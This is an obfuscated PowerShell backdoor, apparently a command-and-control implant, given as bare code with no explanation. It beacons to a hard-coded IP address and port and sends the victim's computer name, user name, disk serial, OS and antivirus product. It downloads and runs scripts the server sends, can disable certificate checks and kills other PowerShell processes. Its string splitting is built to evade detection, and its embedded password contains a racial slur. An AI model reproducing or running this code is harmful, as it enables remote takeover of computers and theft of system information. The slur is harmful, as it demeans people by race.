set ('3'+'Sot64') ( [tYPe]("{1}{5}{4}{2}{3}{0}"-f'typE','Sy','uRit','yPROTOCOL','.Net.seC','STem') );$C5i= [tyPE]("{6}{2}{4}{3}{0}{5}{1}{7}"-F'i','ePOIn','m.nET.','V','seR','C','SySTe','tMaNaGeR'); $eZ0dO = [TYpe]("{2}{0}{1}" -F 'nVE','rT','co') ; $sLHdF=[TYpe]("{5}{2}{4}{1}{0}{3}" -F'N','.E','YSTE','Coding','M.tExt','s') ; $8HFs = [tyPe]("{3}{1}{2}{0}" -F'ErT','.CON','v','SystEm') ; sv lapVmG ([TyPE]("{2}{0}{1}"-F 'crIpTBl','OCk','s')) ; ${GLOB`AL`:_`HOsT} = ("{2}{3}{1}{5}{0}{4}" -f '0','194.5','%host%',',','.189','9.3') ${glO`BAL`:`_PORt} = ("{0}{1}" -f'8','080') ${GL`o`BAL:h`_ID} = ("{1}{0}" -f'Nr_','SvO') + -join ((65..90) + (97..122) | &("{2}{0}{1}" -f 'Ran','dom','Get-') -Count 5 | &("{0}{2}{4}{1}{3}" -f'F','je','orEach-','ct','Ob') {[char]${_}}) ${GL`O`B`AL:H_paC`kaGE} = '<|>' ${G`l`ObA`L:h_w`EB} = ${nu`LL} ${glOb`AL`:`h_SLeep} = 3 ${Glob`A`L:h`_info} = ${n`UlL} ${Glo`BAL:h`_ru`NnINg} = ${Tr`UE} ${G`lO`BaL:H_iP} = ${nU`ll} ${gLO`B`A`l`:h_en`DpoINt} = ("{2}{0}{1}"-f 'ai','n','api/m') ${GLo`BAl`:h_hASh} = ("{0}{1}{6}{3}{5}{7}{4}{2}"-f'D84A','D148D7CF77F','D9','2D64CCDBD84D1','1','86EE','0C4F','4') ${gLoBA`l:`h_aUth} = @{ ("{1}{0}"-f 'er','us') = ("{2}{1}{0}" -f 'son','n','longjoh') ("{1}{0}" -f 'ss','pa') = ("{1}{2}{3}{0}{4}"-f'atniggers','ug','hihat','ef','123') } ${g`LO`BAL:mOd`UlES} = @{ ("{2}{0}{1}"-f 'nin','g','run') = ${faL`sE} ("{1}{0}" -f 'ist','l') = ((("{4}{1}{2}{7}{3}{5}{0}{9}{6}{8}"-f'main','per','si','cea','.aNVmeaNV','NV','p','sten','s1','.')) -cREPlAce ([char]97+[char]78+[char]86),[char]92) } (LS VaRiAbLe:c5I ).ValuE::"securItYP`Ro`T`OcOl" = $3SoT64::"T`ls12"; function sS`Lp`IN`NINg { param ([bool]${pinn`INg}=${Tr`UE}) if (${P`I`NnINg}) { ( get-vaRIABlE C5i -VALueoNL )::"S`ERVE`RCER`T`ificaTEValidati`oN`c`A`Ll`Ba`cK" = { param(${_`SE`NDeR},${_cErtIFI`cA`TE},${_`c`haiN},${_SSLpo`Li`cyeRro`RS}) ${r`EMOt`E_Ha`sh} = ${_CErtIf`iCA`TE}.("{4}{0}{3}{1}{2}"-f 'er','hStri','ng','tHas','GetC').Invoke() if (${G`lOBal:`h`_hAsh} -like ${REMOTe`_`haSh}) { return ${T`RUE} } else { return ${FA`L`sE} } } } else { (DIR ("vA"+"riAbLe"+":C5"+"i")).valuE::"sER`Ve`RCe`Rtif`iCA`TEVALiDat`ion`C`ALlbacK" = { return ${TR`Ue} } } } function mA`In { param () ${g`lob`Al`:h_inFO} = &("{0}{3}{2}{1}" -f 'I','ion','t','nforma') while (${GLO`BAL:H_`RUNn`I`Ng}) { if (&("{1}{0}"-f 'ostC2','P') "$global:h_endpoint/init") { &("{1}{0}{3}{2}" -f'adMod','Lo','es','ul') } &("{0}{3}{2}{1}" -f 'St','leep','-S','art') -s ${gL`OBA`l:H_sl`EEp} } } function LOaD`Mo`Du`leS { param () if (-not ${GLO`B`AL:M`oDules}."rUN`N`inG") { &("{0}{1}" -f 'Pos','tC2') "$global:h_endpoint/modules" (${GLo`B`A`L`:MODUleS}."lI`sT" -join "`r`n") | &("{2}{1}{0}" -f '-Null','t','Ou') } } function inf`Orm`ATION { param () ${H_H`W`iD} = &("{1}{0}{2}" -f 'In','Get-Cim','stance') -Class ("{3}{0}{4}{2}{1}"-f'in32_','disk','cal','w','logi') -Filter ((("{2}{3}{0}{1}"-f' = {0}','C:{0}','Devic','eID')) -F [CHAr]39) | &("{2}{0}{1}" -f 'Obje','ct','Select-') -ExpandProperty ("{3}{1}{2}{0}" -f'er','alnum','b','volumeseri') ${h_H`W`ID} = ${h`_h`WiD}.("{1}{0}{2}"-f'pla','re','ce').Invoke("`r`n","") ${h_c`omP`UtER`N`Ame} = ${env:`coM`P`U`TernAMe} ${H_`Us`ERna`Me} = ${Env:u`s`ER`NAMe} ${H_`Os} = &("{2}{3}{1}{0}" -f'nstance','imI','Get-','C') -Class ("{4}{2}{0}{1}{3}" -f 'r','a','n32_Ope','tingSystem','Wi') | &("{3}{4}{0}{2}{1}"-f '-','ect','Obj','Se','lect') -ExpandProperty ("{1}{2}{0}"-f 'ption','c','a') | &("{2}{1}{0}{3}" -f 'i','Str','Out-','ng') ${h_`os} = ${H_`oS}.("{0}{1}{2}"-f'repl','a','ce').Invoke("`r`n","") ${H_vE`R`SiOn} = ("{1}{0}"-f '2.0]','[V') ${H_E`DR} = &("{3}{1}{0}{2}" -f'nstan','-CimI','ce','Get') -Namespace ("{2}{3}{5}{1}{4}{6}{0}" -f '2','e','root/','Secur','nt','ityC','er') -ClassName ("{4}{1}{3}{2}{0}" -f 't','s','c','Produ','Antiviru') | &("{0}{1}{2}"-f 'Select-','Obje','ct') -ExpandProperty ("{1}{0}{2}{3}" -f'i','d','spl','ayname') | &("{2}{1}{0}"-f'ing','-Str','Out') ${H_`E`DR} = ${h_`EdR}.("{1}{2}{0}" -f 'ce','repl','a').Invoke("`r`n"," - ") ${h_S`P`R`EaD} = '_' return ${H`_iD} + '_' + ${H`_h`WiD} + ${H`_PAcK`Age} + ${h_C`OmP`UtER`NamE} + ${H_p`AC`kAGE} + ${h_US`ERN`AmE} + ${H_P`AcKa`Ge} + ${H_`OS} + ${h_`pac`KaGe} + ${H`_veRs`Ion} + ${h`_pa`ckaGe} + ${H_`Edr} + ${h_pA`Ck`AGE} + ${H_`Spre`AD} + ${h`_`PacK`AgE} } function poST`c2 { param ( [String] ${Qu`Ery}, [String] ${DA`TA} = '' ) &("{0}{1}{2}" -f 'S','SLPinni','ng') ${GLO`BaL:H`_W`Eb} = &("{0}{2}{1}" -f 'New-','ject','Ob') ("{2}{0}{5}{3}{1}{6}{4}"-f't','.W','Sys','.Net','ent','em','ebCli') ${gLOBAl:`H_`wEB}."En`c`oDINg" = ( gI ('V'+'ARiablE'+':slh'+'df') ).Value::"u`Tf8" try { ${gLoBAL`:H_w`EB}."HEAd`ERS"[("{0}{2}{1}" -f'User-A','nt','ge')] = ("{33}{32}{7}{4}{18}{13}{2}{31}{19}{27}{24}{1}{14}{11}{15}{28}{25}{21}{17}{9}{3}{5}{22}{30}{12}{6}{8}{0}{10}{26}{23}{29}{20}{16}" -f 'e/91.0.447',' x','T 10.0;','.36 ','Win','(','o) ','(','Chrom','7','2.1',') Appl',' Geck','ows N','64','eW','/537.36','3','d','Wi','i','it/5','KHTML, li','Safa','4;','K','24 ','n6','eb','r','ke',' ','a/5.0 ','Mozill') ${glOb`AL:`h_weB}."H`EaD`Ers"[("{0}{1}{2}" -f'Auth','ori','zation')] = ("{1}{0}" -f 'asic ','B') + $8hfS::"tO`BaS`E6`4s`TRINg"( ( Gci variaBLe:SLhdF ).Value::"as`cii".("{2}{0}{1}" -f 'etByte','s','G').Invoke(${gL`obAl:H_A`UTH}."us`ER" + ":" + ${GLObaL`:h_`AuTh}."pA`ss")); ${g`lObal`:`H_WEb}."HeA`D`Ers"[("{1}{0}{3}{2}" -f'uest','X-Req','ID','-')] = ( iteM ("vAriA"+"BLe"+":E"+"z"+"0DO") ).VaLuE::"T`OBaS`E64S`T`RINg"( ( get-iTEm vAriABLE:SLhDF ).vAlUE::"u`TF8".("{0}{1}" -f 'GetBy','tes').Invoke(${glob`AL`:h`_InFo})) foreach (${IP} in ${_`hOsT}.("{1}{0}" -f'plit','s').Invoke(',')) { if (${I`P} -eq ("{1}{0}{2}" -f'o','%h','st%')) {continue} ${gLob`Al:H`_Ip} = ${I`p} ${U`RL} = ("{1}{0}{2}" -f'tp','ht','s://') + ${h`_iP} + ':' + ${_p`OrT} + '/' + ${QU`Ery} try { ${resp`O`Nse} = ${G`LoBa`L:H_Web}.("{2}{0}{1}{3}"-f 'lo','adSt','Up','ring').Invoke(${U`RL}, ${dA`TA}) if (${RESpON`sE}) {&("{0}{1}{2}"-f'Pa','rseC','2') ${ReSP`ON`se}} return ${tR`UE} } catch { } } return ${fAL`Se} } finally { if (${G`Loba`L:H`_w`Eb}) { ${gLoB`Al`:`H_WEB}.("{1}{0}{2}"-f'os','disp','e').Invoke() ${glob`A`l:h`_`Web} = ${N`ULl} } } } function exE`cp`LuGiN { param ( [String]${pA`R`AM_scrI`PT}, [bool]${p`ArAm`_pl`U`gIn}=${T`RuE} ) ${Scri`PT_b`L`OCk} = ( GEt-chilDiTeM ("varIAble"+":"+"LA"+"pvMg") ).vALuE::"CrEA`TE"( ( gci ("v"+"ari"+"abL"+"e:sLHdf")).valUe::"U`TF8"."geT`StRi`Ng"( ( dIR ("vaRi"+"Able:"+"8hfS")).vaLUe::("{0}{1}{4}{3}{2}" -f 'F','romBase64S','g','rin','t').Invoke(${PAra`M_`Sc`RI`PT}))) if (${PA`Ram_pL`UG`iN}) { ${j`oB} = &("{1}{0}{2}"-f 'ta','S','rt-Job') -ScriptBlock ${SCR`I`p`T_Bl`OCK} -ArgumentList ${g`loBAl`:h_iP},${G`lo`BAL:_pORT},${glOb`AL`:`h_id},${gl`ObAL:`H_`Auth} | &("{0}{1}{2}" -f 'Wa','i','t-Job') -Timeout 3 } else { ${j`ob} = &("{2}{1}{0}" -f'-Job','rt','Sta') -ScriptBlock ${Scr`Ipt_B`LOcK} | &("{1}{0}" -f'-Job','Wait') -Timeout 3 } if (${J`OB}."st`Ate" -eq ("{0}{1}" -f'Fa','iled')) { throw ${j`OB}."ChilDJO`BS"[0]."JoBsta`T`EI`NFo"."re`ASON"."m`E`sSAgE" } } function CL`E`ArPOwerSheLl { &("{2}{1}{0}" -f'ss','-Proce','Get') ("{2}{1}{0}"-f'ell','rsh','powe') -ErrorAction ("{4}{2}{0}{3}{1}" -f'yC','inue','ilentl','ont','S') | &("{0}{1}{2}"-f'ForEac','h-','Object') { if (${p`ID} -ne ${_}."i`d") { &("{1}{3}{2}{0}" -f'ss','S','ce','top-Pro') -Force -Id ${_}."I`D" } } } function cleaR`j`oB { &("{2}{1}{0}"-f 'b','-Jo','Get') | &("{2}{1}{0}" -f '-Job','ve','Remo') -Force } function PaR`SEc2 { param ( [String]${dA`Ta} ) try { ${DATA`_sT`ReAM} = [System.IO.TextReader](&("{1}{2}{0}"-f 'bject','new','-o') ("{2}{3}{4}{0}{1}"-f'.IO.StringReade','r','S','yst','em')(${dA`Ta})) if (${dAta_sT`RE`AM}."len`gtH" -gt 0) { ${c`oM`MaND} = ${D`A`TA_sTR`EAM}.("{1}{0}{2}"-f 'Lin','Read','e').Invoke() switch (${C`Om`manD}.("{0}{2}{1}" -f 'T','er','oLow').Invoke()) { ("{2}{0}{1}{3}"-f'i','n.module','ma','s') { ${p`ARaM`_M`ODULeS} = ${da`TA_`sT`ReAM}.("{0}{2}{1}"-f'Re','d','adToEn').Invoke(); if (${parAm_m`o`dUL`Es}) { &("{0}{1}{2}" -f'Start-J','o','b') -ScriptBlock ( ( Gi vARiAble:LApvmg).VAlUE::("{1}{0}"-f 'te','Crea').Invoke(${pARA`m_`modULes})) | &("{0}{1}"-f'O','ut-Null') ${gLO`BA`l`:modUL`ES}."R`U`NNiNG" = ${t`RUE} } break } ("{2}{0}{1}" -f 'in.p','lugin','ma') { ${P`Aram`_S`cR`ipT} = ${D`Ata_`STre`Am}.("{1}{0}"-f'nd','ReadToE').Invoke(); if (${p`ArAM`_sC`RIpt}) { .("{2}{0}{1}" -f'ugi','n','ExecPl') ${PAR`Am_SCRi`pt} } break } ("{2}{1}{3}{4}{0}" -f 'al','.l','main.execute','o','c') { ${PA`RaM`_`sCRIpT} = ${DaTA_`S`TREAm}.("{2}{0}{1}"-f 'adToEn','d','Re').Invoke(); if (${PArA`m`_sCRIPt}) { .("{2}{0}{1}{3}" -f'l','ugi','ExecP','n') ${pARAm_ScR`i`pT} ${f`ALsE} } break } ("{1}{3}{2}{0}"-f'te','main.e','mo','xecute.re') { ${PAra`m_`Url} = ${daTA`_S`T`Ream}.("{2}{1}{0}" -f 'e','in','ReadL').Invoke() if (${Pa`R`Am_URL}) { .("{1}{0}{2}" -f'S','S','LPinning') ${f`AL`SE} ${P`ArAm_`SCr`IPT} = (.("{2}{1}{0}"-f'ject','-Ob','New') ("{0}{2}{1}{4}{3}"-f 'sy','et.','stem.N','bClient','We')).("{3}{0}{2}{1}" -f'ownloa','g','dStrin','d').Invoke(${Par`A`M_`UrL}) if (${pA`RaM`_scRiPT}) { &("{1}{2}{0}"-f'ugin','E','xecPl') ${PARam_`S`cR`iPt} ${FA`L`se} } } break } ("{2}{0}{1}"-f 'i','n.sleep','ma') { ${pArA`M_mS} = ${Dat`A`_sTreAm}.("{2}{0}{1}"-f 'ead','Line','R').Invoke() &("{2}{3}{1}{0}" -f 'Sleep','-','Sta','rt') -s (${par`Am`_ms} -as [int]) break } ("{1}{0}{2}{3}"-f 'in.c','ma','l','ear') { .("{1}{0}" -f 'earJob','Cl') break } ("{0}{1}{2}" -f 'main.','e','xit') { .("{1}{0}{3}{2}"-f 'ea','Cl','Powershell','r') break } ("{2}{1}{0}" -f 'all','nst','main.uni') { &("{2}{1}{0}{4}{3}"-f 'r','Powe','Clear','hell','s') Exit(1) } } } } catch { ${MeSS`AGe} = ${_}."e`xcEp`T`iON"."M`ESsAge" ${T`RA`ce} = ${_}."excePtI`on"."s`TaCktr`AcE" ${Re`Spo`N`sE} = ("[exception]`r`nmessage "+'= '+"$message`r`ntrace "+'= '+"$trace") .("{1}{0}{2}"-f'ostC','P','2') "$global:h_endpoint/log" ${rEs`Po`NSe} } } &("{1}{0}" -f 'n','Mai')